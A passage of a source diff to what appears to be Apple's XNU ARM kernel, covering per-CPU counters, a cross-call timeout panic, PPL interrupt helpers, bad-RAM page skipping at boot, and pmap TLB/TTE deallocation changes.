+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <kern/assert.h>
+#include <kern/cpu_data.h>
+#include <kern/counter.h>
+#include <kern/zalloc.h>
+#include <machine/atomic.h>
+#include <machine/machine_routines.h>
+#include <machine/cpu_number.h>
+
+OS_OVERLOADABLE
+void
+counter_add(scalable_counter_t *counter, uint64_t amount)
+{
+       os_atomic_add(zpercpu_get(*counter), amount, relaxed);
+}
+
+OS_OVERLOADABLE
+void
+counter_inc(scalable_counter_t *counter)
+{
+       os_atomic_inc(zpercpu_get(*counter), relaxed);
+}
+
+OS_OVERLOADABLE
+void
+counter_dec(scalable_counter_t *counter)
+{
+       os_atomic_dec(zpercpu_get(*counter), relaxed);
+}
+
+/*
+ * NB: On arm, the preemption disabled implementation is the same as
+ * the normal implementation. Otherwise we would need to enforce that
+ * callers never mix the interfaces for the same counter.
+ */
+OS_OVERLOADABLE
+void
+counter_add_preemption_disabled(scalable_counter_t *counter, uint64_t amount)
+{
+       counter_add(counter, amount);
+}
+
+OS_OVERLOADABLE
+void
+counter_inc_preemption_disabled(scalable_counter_t *counter)
+{
+       counter_inc(counter);
+}
+
+OS_OVERLOADABLE
+void
+counter_dec_preemption_disabled(scalable_counter_t *counter)
+{
+       counter_dec(counter);
+}
index 738e94f02e9af9150c1ba49a99ee6f4a82dec988..dc5d2d20e485c3318ea8b612a4063688358b9193 100644 (file)
@@ -158,6 +158,10 @@ _Static_assert((_COMM_PAGE64_BASE_ADDRESS >= _COMM_PAGE64_NESTING_START) &&
     "region probably needs to be updated.");
 
 #else /* KERNEL_PRIVATE */
+/*
+ * <sys/commpage.h> defines a couple of conveniency macros
+ * to help read data from the commpage.
+ */
 #define _COMM_PAGE_AREA_LENGTH                  (4096)
 
 #define _COMM_PAGE_BASE_ADDRESS                 _COMM_PAGE64_BASE_ADDRESS
index 11ad96d9e0f6948f04012a8fc54b82ed4c28cc2d..faa3b1e80be0e8e6d2146ed4f9cb4c3a18a1e907 100644 (file)
@@ -62,13 +62,15 @@ vm_address_t     percpu_base_cur;
 cpu_data_t       PERCPU_DATA(cpu_data);
 cpu_data_entry_t CpuDataEntries[MAX_CPUS];
 
-static lck_grp_t cpu_lck_grp;
-static lck_rw_t cpu_state_lock;
+static LCK_GRP_DECLARE(cpu_lck_grp, "cpu_lck_grp");
+static LCK_RW_DECLARE(cpu_state_lock, &cpu_lck_grp);
 
 unsigned int    real_ncpus = 1;
 boolean_t       idle_enable = FALSE;
 uint64_t        wake_abstime = 0x0ULL;
 
+extern uint64_t xcall_ack_timeout_abstime;
+
 #if defined(HAS_IPI)
 extern unsigned int gFastIPI;
 #endif /* defined(HAS_IPI) */
@@ -427,6 +429,11 @@ cpu_signal_internal(cpu_data_t *target_proc,
        }
 
        if ((signal == SIGPxcall) || (signal == SIGPxcallImm)) {
+               uint64_t start_mabs_time, max_mabs_time, current_mabs_time;
+               current_mabs_time = start_mabs_time = mach_absolute_time();
+               max_mabs_time = xcall_ack_timeout_abstime + current_mabs_time;
+               assert(max_mabs_time > current_mabs_time);
+
                do {
                        current_signals = target_proc->cpu_signal;
                        if ((current_signals & SIGPdisabled) == SIGPdisabled) {
@@ -447,7 +454,20 @@ cpu_signal_internal(cpu_data_t *target_proc,
                        if (!swap_success && (current_proc->cpu_signal & signal)) {
                                cpu_handle_xcall(current_proc);
                        }
-               } while (!swap_success);
+               } while (!swap_success && ((current_mabs_time = mach_absolute_time()) < max_mabs_time));
+
+               /*
+                * If we time out while waiting for the target CPU to respond, it's possible that no
+                * other CPU is available to handle the watchdog interrupt that would eventually trigger
+                * a panic. To prevent this from happening, we just panic here to flag this condition.
+                */
+               if (__improbable(current_mabs_time >= max_mabs_time)) {
+                       uint64_t end_time_ns, xcall_ack_timeout_ns;
+                       absolutetime_to_nanoseconds(current_mabs_time - start_mabs_time, &end_time_ns);
+                       absolutetime_to_nanoseconds(xcall_ack_timeout_abstime, &xcall_ack_timeout_ns);
+                       panic("CPU%u has failed to respond to cross-call after %llu nanoseconds (timeout = %llu ns)",
+                           target_proc->cpu_number, end_time_ns, xcall_ack_timeout_ns);
+               }
 
                if (signal == SIGPxcallImm) {
                        target_proc->cpu_imm_xcall_p0 = p0;
@@ -825,13 +845,6 @@ ml_cpu_can_exit(__unused int cpu_id)
        return false;
 }
 
-void
-ml_cpu_init_state(void)
-{
-       lck_grp_init(&cpu_lck_grp, "cpu_lck_grp", LCK_GRP_ATTR_NULL);
-       lck_rw_init(&cpu_state_lock, &cpu_lck_grp, LCK_ATTR_NULL);
-}
-
 #ifdef USE_APPLEARMSMP
 
 void
index d9343a0e3c8903d4f7d82432aa2ef58dff74d8db..a0648dc3d50106832d8cae58a1179604bdefbd83 100644 (file)
@@ -72,7 +72,7 @@ static_assert(sizeof(cpumap_t) * CHAR_BIT >= MAX_CPUS, "cpumap_t bitvector is to
 #define CPUWINDOWS_BASE                 (VM_MAX_KERNEL_ADDRESS & CPUWINDOWS_BASE_MASK)
 #define CPUWINDOWS_TOP                  (CPUWINDOWS_BASE + (MAX_CPUS * CPUWINDOWS_MAX * ARM_PGBYTES))
 
-static_assert((CPUWINDOWS_BASE >= VM_MIN_KERNEL_ADDRESS) && (CPUWINDOWS_TOP <= VM_MAX_KERNEL_ADDRESS),
+static_assert((CPUWINDOWS_BASE >= VM_MIN_KERNEL_ADDRESS) && ((CPUWINDOWS_TOP - 1) <= VM_MAX_KERNEL_ADDRESS),
     "CPU copy windows too large for CPUWINDOWS_BASE_MASK value");
 
 typedef struct cpu_data_entry {
index 98fd21b3a85da1e47b959e0c5239e0fb5af9b8dc..8246489dc7d529e63b5fe2f9ae39fd0aee5dd8ce 100644 (file)
@@ -512,7 +512,7 @@ lck_spin_init(
 /*
  * arm_usimple_lock is a lck_spin_t without a group or attributes
  */
-void inline
+MARK_AS_HIBERNATE_TEXT void inline
 arm_usimple_lock_init(simple_lock_t lck, __unused unsigned short initial_value)
 {
        lck->type = LCK_SPIN_TYPE;
index 145a783d380616386d0f834afc7e6dad39d09146..072ed38c2dc542910c86be635dd26537434a8280 100644 (file)
@@ -166,6 +166,17 @@ ml_init_lock_timeout(void)
        high_MutexSpin = low_MutexSpin;
 }
 
+/*
+ * This is called when all of the ml_processor_info_t structures have been
+ * initialized and all the processors have been started through processor_start().
+ *
+ * Required by the scheduler subsystem.
+ */
+void
+ml_cpu_init_completed(void)
+{
+}
+
 /*
  * This is called from the machine-independent routine cpu_up()
  * to perform machine-dependent info updates.
index 22cb5a66fab8a622fe78194c458264d76b6ee2fe..ce2d3cb27a089e6721c4182e9f0894e68a3c2920 100644 (file)
@@ -301,9 +301,6 @@ cluster_type_t ml_get_boot_cluster(void);
  * @field coresight_regs    IO-mapped virtual address of CoreSight debug register block.
  * @field coresight_pa      Physical address of CoreSight register block.
  * @field coresight_len     Length of CoreSight register block.
- * @field self_ipi_irq      AIC IRQ vector for self IPI (cpuX->cpuX).  0 if unsupported.
- * @field other_ipi_irq     AIC IRQ vector for other IPI (cpuX->cpuY).  0 if unsupported.
- * @field pmi_irq           AIC IRQ vector for performance management IRQ.  0 if unsupported.
  * @field die_cluster_id    Cluster ID within the local die (EDT: die-cluster-id)
  * @field cluster_core_id   Core ID within the local cluster (EDT: cluster-core-id)
  */
@@ -327,9 +324,6 @@ typedef struct ml_topology_cpu {
        vm_offset_t                     coresight_regs;
        uint64_t                        coresight_pa;
        uint64_t                        coresight_len;
-       int                             self_ipi_irq;
-       int                             other_ipi_irq;
-       int                             pmi_irq;
        unsigned int                    die_cluster_id;
        unsigned int                    cluster_core_id;
 } ml_topology_cpu_t;
@@ -683,6 +677,11 @@ uint64_t ml_get_timebase_entropy(void);
 
 void ml_init_lock_timeout(void);
 
+#if __arm64__
+uint64_t virtual_timeout_inflate_ns(unsigned int vti, uint64_t timeout);
+uint64_t virtual_timeout_inflate_abs(unsigned int vti, uint64_t timeout);
+#endif
+
 boolean_t ml_delay_should_spin(uint64_t interval);
 
 void ml_delay_on_yield(void);
@@ -775,6 +774,7 @@ vm_map_offset_t ml_get_max_offset(
 #define MACHINE_MAX_OFFSET_DEVICE       0x08
 #endif
 
+extern void     ml_cpu_init_completed(void);
 extern void     ml_cpu_up(void);
 extern void     ml_cpu_down(void);
 extern void     ml_arm_sleep(void);
index 0c5617c3044c526b4ee2d62a7f2a6f49e4a0212f..18031f83b309a9b020295188872a61827dbe9ee4 100644 (file)
@@ -56,12 +56,20 @@ configure_misc_apple_regs(void)
 #endif /* __arm64__ */
 
 #if HAS_APPLE_PAC
+
+
+/**
+ * Returns the default ROP key.
+ */
 uint64_t
 ml_default_rop_pid(void)
 {
        return 0;
 }
 
+/**
+ * Returns the default JOP key.
+ */
 uint64_t
 ml_default_jop_pid(void)
 {
index f7fca614b8aa2addf323d6749841f4f24bda664e..aa60dd3fe3a480182d006a2663f1b66a862d39a7 100644 (file)
@@ -526,6 +526,7 @@ machine_thread_group_init(struct thread_group *tg)
        data.thread_group_id = thread_group_get_id(tg);
        data.thread_group_data = thread_group_get_machine_data(tg);
        data.thread_group_size = thread_group_machine_data_size();
+       data.thread_group_flags = thread_group_get_flags(tg);
        sched_perfcontrol_thread_group_init(&data);
 }
 
@@ -539,6 +540,7 @@ machine_thread_group_deinit(struct thread_group *tg)
        data.thread_group_id = thread_group_get_id(tg);
        data.thread_group_data = thread_group_get_machine_data(tg);
        data.thread_group_size = thread_group_machine_data_size();
+       data.thread_group_flags = thread_group_get_flags(tg);
        sched_perfcontrol_thread_group_deinit(&data);
 }
 
index b7cead5fa54c4b5743a83bf7af051de6498e09a8..053fe3a94633506f9ba1cd8782833e069cc86fc7 100644 (file)
@@ -1148,6 +1148,10 @@ DebuggerXCall(
                INTERRUPT_MASKED_DEBUG_START(current_thread()->machine.int_handler_addr, current_thread()->machine.int_type);
        }
 
+#if defined(__arm64__)
+       current_thread()->machine.kpcb = NULL;
+#endif /* defined(__arm64__) */
+
        /* Any cleanup for our pushed context should go here */
 }
 
index 4719ce5b87adca2b2589eeef570a55e6e1e6371f..60eb475d270f978b09278f84bcd62312e19d2221 100644 (file)
@@ -130,7 +130,6 @@ extern u_int32_t random(void); /* from <libkern/libkern.h> */
 static bool alloc_asid(pmap_t pmap);
 static void free_asid(pmap_t pmap);
 static void flush_mmu_tlb_region_asid_async(vm_offset_t va, size_t length, pmap_t pmap);
-static void flush_mmu_tlb_tte_asid_async(vm_offset_t va, pmap_t pmap);
 static void flush_mmu_tlb_full_asid_async(pmap_t pmap);
 static pt_entry_t wimg_to_pte(unsigned int wimg);
 
@@ -138,7 +137,6 @@ struct page_table_ops {
        bool (*alloc_id)(pmap_t pmap);
        void (*free_id)(pmap_t pmap);
        void (*flush_tlb_region_async)(vm_offset_t va, size_t length, pmap_t pmap);
-       void (*flush_tlb_tte_async)(vm_offset_t va, pmap_t pmap);
        void (*flush_tlb_async)(pmap_t pmap);
        pt_entry_t (*wimg_to_pte)(unsigned int wimg);
 };
@@ -148,7 +146,6 @@ static const struct page_table_ops native_pt_ops =
        .alloc_id = alloc_asid,
        .free_id = free_asid,
        .flush_tlb_region_async = flush_mmu_tlb_region_asid_async,
-       .flush_tlb_tte_async = flush_mmu_tlb_tte_asid_async,
        .flush_tlb_async = flush_mmu_tlb_full_asid_async,
        .wimg_to_pte = wimg_to_pte,
 };
@@ -599,6 +596,12 @@ pt_attr_leaf_xn(__unused const pt_attr_t * const pt_attr)
        return ARM_PTE_NX;
 }
 
+static inline uintptr_t
+pt_attr_leaf_x(__unused const pt_attr_t * const pt_attr)
+{
+       return ARM_PTE_PNX;
+}
+
 __unused static inline uintptr_t
 pt_attr_ln_offmask(__unused const pt_attr_t * const pt_attr, unsigned int level)
 {
@@ -861,7 +864,7 @@ struct pmap                     kernel_pmap_store MARK_AS_PMAP_DATA;
 SECURITY_READ_ONLY_LATE(pmap_t) kernel_pmap = &kernel_pmap_store;
 
 struct vm_object pmap_object_store VM_PAGE_PACKED_ALIGNED;       /* store pt pages */
-vm_object_t     pmap_object = &pmap_object_store;
+SECURITY_READ_ONLY_LATE(vm_object_t) pmap_object = &pmap_object_store;
 
 static SECURITY_READ_ONLY_LATE(zone_t) pmap_zone;  /* zone of pmap structures */
 
@@ -1791,6 +1794,7 @@ pmap_ledger_validate(void * ledger)
  * Trace levels are controlled by a bitmask in which each
  * level can be enabled/disabled by the (1<<level) position
  * in the boot arg
+ * Level 0: PPL extension functionality
  * Level 1: pmap lifecycle (create/destroy/switch)
  * Level 2: mapping lifecycle (enter/remove/protect/nest/unnest)
  * Level 3: internal state management (attributes/fast-fault)
@@ -1850,10 +1854,10 @@ static kern_return_t pmap_expand(
        pmap_t, vm_map_address_t, unsigned int options, unsigned int level);
 
 static int pmap_remove_range(
-       pmap_t, vm_map_address_t, pt_entry_t *, pt_entry_t *, uint32_t *);
+       pmap_t, vm_map_address_t, pt_entry_t *, pt_entry_t *);
 
 static int pmap_remove_range_options(
-       pmap_t, vm_map_address_t, pt_entry_t *, pt_entry_t *, uint32_t *, bool *, int);
+       pmap_t, vm_map_address_t, pt_entry_t *, pt_entry_t *, vm_map_address_t *, bool *, int);
 
 static tt_entry_t *pmap_tt1_allocate(
        pmap_t, vm_size_t, unsigned int);
@@ -1871,7 +1875,7 @@ static kern_return_t pmap_tt_allocate(
 #define PMAP_TT_ALLOCATE_NOWAIT         0x1
 
 static void pmap_tte_deallocate(
-       pmap_t, tt_entry_t *, unsigned int);
+       pmap_t, vm_offset_t, vm_offset_t, bool, tt_entry_t *, unsigned int);
 
 const unsigned int arm_hardware_page_size = ARM_PGBYTES;
 const unsigned int arm_pt_desc_size = sizeof(pt_desc_t);
@@ -2100,10 +2104,11 @@ PMAP_SUPPORT_PROTOTYPES(
        void,
        pmap_page_protect_options, (ppnum_t ppnum,
        vm_prot_t prot,
-       unsigned int options), PMAP_PAGE_PROTECT_OPTIONS_INDEX);
+       unsigned int options,
+       void *arg), PMAP_PAGE_PROTECT_OPTIONS_INDEX);
 
 PMAP_SUPPORT_PROTOTYPES(
-       void,
+       vm_map_address_t,
        pmap_protect_options, (pmap_t pmap,
        vm_map_address_t start,
        vm_map_address_t end,
@@ -2129,7 +2134,7 @@ PMAP_SUPPORT_PROTOTYPES(
        pmap_reference, (pmap_t pmap), PMAP_REFERENCE_INDEX);
 
 PMAP_SUPPORT_PROTOTYPES(
-       int,
+       vm_map_address_t,
        pmap_remove_options, (pmap_t pmap,
        vm_map_address_t start,
        vm_map_address_t end,
@@ -2199,7 +2204,7 @@ PMAP_SUPPORT_PROTOTYPES(
 
 #if __ARM_RANGE_TLBI__
 PMAP_SUPPORT_PROTOTYPES(
-       void,
+       vm_map_address_t,
        phys_attribute_clear_range, (pmap_t pmap,
        vm_map_address_t start,
        vm_map_address_t end,
@@ -2271,6 +2276,15 @@ PMAP_SUPPORT_PROTOTYPES(
        bool,
        pmap_lookup_in_loaded_trust_caches, (const uint8_t cdhash[CS_CDHASH_LEN]), PMAP_LOOKUP_IN_LOADED_TRUST_CACHES_INDEX);
 
+PMAP_SUPPORT_PROTOTYPES(
+       void,
+       pmap_set_compilation_service_cdhash, (const uint8_t cdhash[CS_CDHASH_LEN]),
+       PMAP_SET_COMPILATION_SERVICE_CDHASH_INDEX);
+
+PMAP_SUPPORT_PROTOTYPES(
+       bool,
+       pmap_match_compilation_service_cdhash, (const uint8_t cdhash[CS_CDHASH_LEN]),
+       PMAP_MATCH_COMPILATION_SERVICE_CDHASH_INDEX);
 
 #if XNU_MONITOR
 static void pmap_mark_page_as_ppl_page(pmap_paddr_t pa);
@@ -2335,6 +2349,13 @@ static void pmap_pgtrace_remove_clone(pmap_t pmap, pmap_paddr_t pa_page, vm_map_
 static void pmap_pgtrace_remove_all_clone(pmap_paddr_t pa);
 #endif
 
+#if DEVELOPMENT || DEBUG
+PMAP_SUPPORT_PROTOTYPES(
+       kern_return_t,
+       pmap_test_text_corruption, (pmap_paddr_t),
+       PMAP_TEST_TEXT_CORRUPTION_INDEX);
+#endif /* DEVELOPMENT || DEBUG */
+
 #if     (__ARM_VMSA__ > 7)
 /*
  * The low global vector page is mapped at a fixed alias.
@@ -2410,20 +2431,26 @@ const void * __ptrauth_ppl_handler const ppl_handler_table[PMAP_COUNT] = {
        [PMAP_IS_TRUST_CACHE_LOADED_INDEX] = pmap_is_trust_cache_loaded_internal,
        [PMAP_LOOKUP_IN_STATIC_TRUST_CACHE_INDEX] = pmap_lookup_in_static_trust_cache_internal,
        [PMAP_LOOKUP_IN_LOADED_TRUST_CACHES_INDEX] = pmap_lookup_in_loaded_trust_caches_internal,
+       [PMAP_SET_COMPILATION_SERVICE_CDHASH_INDEX] = pmap_set_compilation_service_cdhash_internal,
+       [PMAP_MATCH_COMPILATION_SERVICE_CDHASH_INDEX] = pmap_match_compilation_service_cdhash_internal,
        [PMAP_TRIM_INDEX] = pmap_trim_internal,
        [PMAP_LEDGER_ALLOC_INIT_INDEX] = pmap_ledger_alloc_init_internal,
        [PMAP_LEDGER_ALLOC_INDEX] = pmap_ledger_alloc_internal,
        [PMAP_LEDGER_FREE_INDEX] = pmap_ledger_free_internal,
-#if HAS_APPLE_PAC && XNU_MONITOR
+#if HAS_APPLE_PAC
        [PMAP_SIGN_USER_PTR] = pmap_sign_user_ptr_internal,
        [PMAP_AUTH_USER_PTR] = pmap_auth_user_ptr_internal,
-#endif /* HAS_APPLE_PAC && XNU_MONITOR */
+#endif /* HAS_APPLE_PAC */
 #if __ARM_RANGE_TLBI__
        [PHYS_ATTRIBUTE_CLEAR_RANGE_INDEX] = phys_attribute_clear_range_internal,
 #endif /* __ARM_RANGE_TLBI__ */
 #if __has_feature(ptrauth_calls) && defined(XNU_TARGET_OS_OSX)
        [PMAP_DISABLE_USER_JOP_INDEX] = pmap_disable_user_jop_internal,
 #endif /* __has_feature(ptrauth_calls) && defined(XNU_TARGET_OS_OSX) */
+
+#if DEVELOPMENT || DEBUG
+       [PMAP_TEST_TEXT_CORRUPTION_INDEX] = pmap_test_text_corruption_internal,
+#endif /* DEVELOPMENT || DEBUG */
 };
 #endif
 
@@ -2528,6 +2555,64 @@ pmap_get_cpu_data(void)
        return pmap_cpu_data;
 }
 
+#if __arm64__
+/*
+ * Disable interrupts and return previous state.
+ *
+ * The PPL has its own interrupt state facility separately from
+ * ml_set_interrupts_enable(), since that function is not part of the
+ * PPL, and so doing things like manipulating untrusted data and
+ * taking ASTs.
+ *
+ * @return The previous interrupt state, to be restored with
+ *         pmap_interrupts_restore().
+ */
+static uint64_t __attribute__((warn_unused_result)) __used
+pmap_interrupts_disable(void)
+{
+       uint64_t state = __builtin_arm_rsr64("DAIF");
+
+       if ((state & DAIF_STANDARD_DISABLE) != DAIF_STANDARD_DISABLE) {
+               __builtin_arm_wsr64("DAIFSet", DAIFSC_STANDARD_DISABLE);
+       }
+
+       return state;
+}
+
+/*
+ * Restore previous interrupt state.
+ *
+ * @param state The previous interrupt state to restore.
+ */
+static void __used
+pmap_interrupts_restore(uint64_t state)
+{
+       // no unknown bits?
+       assert((state & ~DAIF_ALL) == 0);
+
+       if (state != DAIF_STANDARD_DISABLE) {
+               __builtin_arm_wsr64("DAIF", state);
+       }
+}
+
+/*
+ * Query interrupt state.
+ *
+ * ml_get_interrupts_enabled() is safe enough at the time of writing
+ * this comment, but because it is not considered part of the PPL, so
+ * could change without notice, and because it presently only checks
+ * DAIF_IRQ, we have our own version.
+ *
+ * @return true if interrupts are enable (not fully disabled).
+ */
+
+static bool __attribute__((warn_unused_result)) __used
+pmap_interrupts_enabled(void)
+{
+       return (__builtin_arm_rsr64("DAIF") & DAIF_STANDARD_DISABLE) != DAIF_STANDARD_DISABLE;
+}
+#endif /* __arm64__ */
+
 #if XNU_MONITOR
 /*
  * pmap_set_range_xprr_perm takes a range (specified using start and end) that
@@ -2786,14 +2871,12 @@ pmap_pages_reclaim(
                        pmap_simple_unlock(&pt_pages_lock);
                        return (pmap_paddr_t)0;
                } else {
-                       int                     remove_count = 0;
                        bool                    need_strong_sync = false;
                        vm_map_address_t        va;
                        pmap_t                  pmap;
                        pt_entry_t              *bpte, *epte;
                        pt_entry_t              *pte_p;
                        tt_entry_t              *tte_p;
-                       uint32_t                rmv_spte = 0;
 
                        pmap_simple_unlock(&pt_pages_lock);
                        pmap = ptdp->pmap;
@@ -2828,25 +2911,19 @@ pmap_pages_reclaim(
                                         * which could cause the counter to drift
                                         * more and more.
                                         */
-                                       remove_count += pmap_remove_range_options(
-                                               pmap, va, bpte, epte,
-                                               &rmv_spte, &need_strong_sync, PMAP_OPTIONS_REMOVE);
+                                       pmap_remove_range_options(
+                                               pmap, va, bpte, epte, NULL,
+                                               &need_strong_sync, PMAP_OPTIONS_REMOVE);
                                        if (ptd_get_info(ptdp, pte_p)->refcnt != 0) {
                                                panic("%s: ptdp %p, count %d", __FUNCTION__, ptdp, ptd_get_info(ptdp, pte_p)->refcnt);
                                        }
 
-                                       pmap_tte_deallocate(pmap, tte_p, pt_attr_twig_level(pt_attr));
-
-                                       if (remove_count > 0) {
-                                               pmap_get_pt_ops(pmap)->flush_tlb_region_async(va, (size_t)pt_attr_leaf_table_size(pt_attr), pmap);
-                                       } else {
-                                               pmap_get_pt_ops(pmap)->flush_tlb_tte_async(va, pmap);
-                                       }
+                                       pmap_tte_deallocate(pmap, va, va + (size_t)pt_attr_leaf_table_size(pt_attr), need_strong_sync,
+                                           tte_p, pt_attr_twig_level(pt_attr));
                                }
                        }
                        // Undo the lock we grabbed when we found ptdp above
                        pmap_unlock(pmap);
-                       pmap_sync_tlb(need_strong_sync);
                }
                pmap_simple_lock(&pmap_pages_lock);
        }
@@ -3259,21 +3336,22 @@ pmap_pages_free(
        pmap_paddr_t    pa,
        unsigned        size)
 {
-       pmap_simple_lock(&pmap_pages_lock);
-
-       if (pmap_pages_request_count != 0) {
+       if (__improbable(pmap_pages_request_count != 0)) {
                page_free_entry_t       *page_entry;
 
-               pmap_pages_request_count--;
-               page_entry = (page_free_entry_t *)phystokv(pa);
-               page_entry->next = pmap_pages_reclaim_list;
-               pmap_pages_reclaim_list = page_entry;
-               pmap_simple_unlock(&pmap_pages_lock);
+               pmap_simple_lock(&pmap_pages_lock);
 
-               return;
-       }
+               if (pmap_pages_request_count != 0) {
+                       pmap_pages_request_count--;
+                       page_entry = (page_free_entry_t *)phystokv(pa);
+                       page_entry->next = pmap_pages_reclaim_list;
+                       pmap_pages_reclaim_list = page_entry;
+                       pmap_simple_unlock(&pmap_pages_lock);
+                       return;
+               }
 
-       pmap_simple_unlock(&pmap_pages_lock);
+               pmap_simple_unlock(&pmap_pages_lock);
+       }
 
 #if XNU_MONITOR
        (void)size;
@@ -5045,10 +5123,178 @@ pmap_virtual_region(
        return ret;
 }
 
+/*
+ * Routines to track and allocate physical pages during early boot.
+ * On most systems that memory runs from first_avail through to avail_end
+ * with no gaps.
+ *
+ * However if the system supports ECC and bad_ram_pages_count > 0, we
+ * need to be careful and skip those pages.
+ */
+static unsigned int avail_page_count = 0;
+static bool need_ram_ranges_init = true;
+
+#if defined(__arm64__)
+pmap_paddr_t *bad_ram_pages = NULL;
+unsigned int bad_ram_pages_count = 0;
+
+/*
+ * We use this sub-range of bad_ram_pages for pmap_next_page()
+ */
+static pmap_paddr_t *skip_pages;
+static unsigned int skip_pages_count = 0;
+
+#define MAX_BAD_RAM_PAGE_COUNT 64
+static pmap_paddr_t bad_ram_pages_arr[MAX_BAD_RAM_PAGE_COUNT];
+
+/*
+ * XXX - temporary code to get the bad pages array from boot-args.
+ * expects a comma separated list of offsets from the start
+ * of physical memory to be considered bad.
+ *
+ * HERE JOE -- will eventually be replaced by data provided by iboot
+ */
+static void
+parse_bad_ram_pages_boot_arg(void)
+{
+       char buf[256] = {0};
+       char *s = buf;
+       char *end;
+       int count = 0;
+       pmap_paddr_t num;
+       extern uint64_t strtouq(const char *, char **, int);
+
+       if (!PE_parse_boot_arg_str("bad_ram_pages", buf, sizeof(buf))) {
+               goto done;
+       }
+
+       while (*s && count < MAX_BAD_RAM_PAGE_COUNT) {
+               num = (pmap_paddr_t)strtouq(s, &end, 0);
+               if (num == 0) {
+                       break;
+               }
+               num &= ~PAGE_MASK;
+
+               bad_ram_pages_arr[count++] = gDramBase + num;
+
+               if (*end != ',') {
+                       break;
+               }
+
+               s = end + 1;
+       }
+
+done:
+       bad_ram_pages = bad_ram_pages_arr;
+       bad_ram_pages_count = count;
+}
+
+/*
+ * Comparison routine for qsort of array of physical addresses.
+ */
+static int
+pmap_paddr_cmp(void *a, void *b)
+{
+       pmap_paddr_t *x = a;
+       pmap_paddr_t *y = b;
+       if (*x < *y) {
+               return -1;
+       }
+       return *x > *y;
+}
+#endif /* defined(__arm64__) */
+
+/*
+ * Look up ppn in the sorted bad_ram_pages array.
+ */
+bool
+pmap_is_bad_ram(__unused ppnum_t ppn)
+{
+#if defined(__arm64__)
+       pmap_paddr_t pa = ptoa(ppn);
+       int low = 0;
+       int high = bad_ram_pages_count - 1;
+       int mid;
+
+       while (low <= high) {
+               mid = (low + high) / 2;
+               if (bad_ram_pages[mid] < pa) {
+                       low = mid + 1;
+               } else if (bad_ram_pages[mid] > pa) {
+                       high = mid - 1;
+               } else {
+                       return true;
+               }
+       }
+#endif /* defined(__arm64__) */
+       return false;
+}
+
+/*
+ * Initialize the count of available pages. If we have bad_ram_pages, then sort the list of them.
+ * No lock needed here, as this code is called while kernel boot up is single threaded.
+ */
+static void
+initialize_ram_ranges(void)
+{
+       pmap_paddr_t first = first_avail;
+       pmap_paddr_t end = avail_end;
+
+       assert(first <= end);
+       assert(first == (first & ~PAGE_MASK));
+       assert(end == (end & ~PAGE_MASK));
+       avail_page_count = atop(end - first);
+
+#if defined(__arm64__)
+       /*
+        * XXX Temporary code for testing, until there is iboot support
+        *
+        * Parse a list of known bad pages from a boot-args.
+        */
+       parse_bad_ram_pages_boot_arg();
+
+       /*
+        * Sort and filter the bad pages list and adjust avail_page_count.
+        */
+       if (bad_ram_pages_count != 0) {
+               qsort(bad_ram_pages, bad_ram_pages_count, sizeof(*bad_ram_pages), (cmpfunc_t)pmap_paddr_cmp);
+               skip_pages = bad_ram_pages;
+               skip_pages_count = bad_ram_pages_count;
+
+               /* ignore any pages before first */
+               while (skip_pages_count > 0 && skip_pages[0] < first) {
+                       --skip_pages_count;
+                       ++skip_pages;
+               }
+
+               /* ignore any pages at or after end */
+               while (skip_pages_count > 0 && skip_pages[skip_pages_count - 1] >= end) {
+                       --skip_pages_count;
+               }
+
+               avail_page_count -= skip_pages_count;
+       }
+#endif /* defined(__arm64__) */
+       need_ram_ranges_init = false;
+}
+
 unsigned int
 pmap_free_pages(
        void)
 {
+       if (need_ram_ranges_init) {
+               initialize_ram_ranges();
+       }
+       return avail_page_count;
+}
+
+unsigned int
+pmap_free_pages_span(
+       void)
+{
+       if (need_ram_ranges_init) {
+               initialize_ram_ranges();
+       }
        return (unsigned int)atop(avail_end - first_avail);
 }
 
@@ -5066,14 +5312,39 @@ boolean_t
 pmap_next_page(
        ppnum_t *pnum)
 {
+       if (need_ram_ranges_init) {
+               initialize_ram_ranges();
+       }
+
+#if defined(__arm64__)
+       /*
+        * Skip over any known bad pages.
+        */
+       while (skip_pages_count > 0 && first_avail == skip_pages[0]) {
+               first_avail += PAGE_SIZE;
+               ++skip_pages;
+               --skip_pages_count;
+       }
+#endif /* defined(__arm64__) */
+
        if (first_avail != avail_end) {
                *pnum = (ppnum_t)atop(first_avail);
                first_avail += PAGE_SIZE;
+               assert(avail_page_count > 0);
+               --avail_page_count;
                return TRUE;
        }
+       assert(avail_page_count == 0);
        return FALSE;
 }
 
+void
+pmap_retire_page(
+       __unused ppnum_t pnum)
+{
+       /* XXX Justin TBD - mark the page as unusable in pmap data structures */
+}
+
 
 /*
  *     Initialize the pmap module.
@@ -5670,7 +5941,7 @@ pmap_deallocate_all_leaf_tts(pmap_t pmap, tt_entry_t * first_ttep, unsigned leve
 
                /* Remove the TTE. */
                pmap_lock(pmap);
-               pmap_tte_deallocate(pmap, ttep, level);
+               pmap_tte_deallocate(pmap, 0, 0, false, ttep, level);
                pmap_unlock(pmap);
        }
 }
@@ -5742,7 +6013,7 @@ pmap_destroy_internal(
        for (i = 0; i < pmap->tte_index_max; i++) {
                ttep = &pmap->tte[i];
                if ((*ttep & ARM_TTE_TYPE_MASK) == ARM_TTE_TYPE_TABLE) {
-                       pmap_tte_deallocate(pmap, ttep, PMAP_TT_L1_LEVEL);
+                       pmap_tte_deallocate(pmap, 0, 0, false, ttep, PMAP_TT_L1_LEVEL);
                }
        }
        pmap_unlock(pmap);
@@ -6187,12 +6458,18 @@ pmap_tt_deallocate(
  *       must have a refcnt of zero before the TTE can be removed.
  *
  * @param pmap The pmap containing the page table whose TTE is being removed.
+ * @param va_start Beginning of the VA range mapped by the table being removed, for TLB maintenance
+ * @param va_end Non-inclusive end of the VA range mapped by the table being removed, for TLB maintenance
+ * @param need_strong_sync Indicates whether strong DSB should be used to synchronize TLB maintenance
  * @param ttep Pointer to the TTE that should be cleared out.
  * @param level The level of the page table that contains the TTE to be removed.
  */
 static void
 pmap_tte_remove(
        pmap_t pmap,
+       vm_offset_t va_start,
+       vm_offset_t va_end,
+       bool need_strong_sync,
        tt_entry_t *ttep,
        unsigned int level)
 {
@@ -6222,6 +6499,17 @@ pmap_tte_remove(
